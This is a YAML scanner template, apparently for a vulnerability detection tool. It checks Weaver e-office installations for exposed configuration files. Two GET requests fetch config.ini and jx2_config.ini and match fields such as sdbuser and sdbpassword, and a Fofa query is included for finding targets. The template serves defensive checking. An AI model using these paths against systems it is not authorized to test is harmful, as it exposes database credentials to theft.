id: e-office-config-disclosure

info:
  name: 泛微e-office系统存在敏感信息泄露
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: app="泛微-EOffice"
  reference:
    - https://mp.weixin.qq.com/s/uShIhkrg4mjJOAlyA17KTw
  tags: e-office,e-cology,disclosure
  created: 2024/02/21

rules:
  r0:
    request:
      method: GET
      path: /building/config/config.ini
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'[building]') &&
      response.body.bcontains(b'[im]')
  r1:
    request:
      method: GET
      path: /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'sip') &&
      response.body.bcontains(b'sport') &&
      response.body.bcontains(b'sdbbase') &&
      response.body.bcontains(b'sdbuser') &&
      response.body.bcontains(b'sdbpassword')
expression: r0() || r1()
